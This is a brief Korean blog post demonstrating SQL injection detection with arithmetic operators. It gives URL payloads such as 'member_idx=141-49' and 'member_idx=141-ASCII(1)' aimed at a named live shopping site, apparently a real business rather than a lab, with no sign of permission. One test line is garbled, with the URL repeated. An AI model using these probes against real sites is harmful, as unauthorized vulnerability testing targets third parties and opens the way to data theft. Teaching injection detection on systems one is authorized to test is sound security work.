연산자 기호를 이용한 sql 인젝션 실습
2021. 4. 11. 23:06ㆍ웹 취약점
실습사이트
snspay.kr/userShop/?member_idx=141
판촉물전문 좋은데이
snspay.kr
테스트 구문
snspay.kr/userShop/?snspay.kr/userShop/?snspay.kr/userShop/?member_idx=141-49
snspay.kr/userShop/?member_idx=141-ASCII(1)
해당 구문으로 URL 끝에 연산자와 숫자, 아스키 등으로 테스트할 시에
처리되어 화면에 결과를 출력한다면 이것도 SQL인젝션 취약점이 존재한다고 볼수있음.
'웹 취약점' 카테고리의 다른 글
| 디렉토리 인덱싱 취약점 (0) | 2021.04.13 |
|---|---|
| SQLMAP을 이용한 인젝션 자동화공격 (0) | 2021.04.11 |
| 에러기반 sql 인젝션 (0) | 2021.04.11 |
| UNION SQL 인젝션 활용 (0) | 2021.04.11 |
| UNION SQL 인젝션 (0) | 2021.04.07 |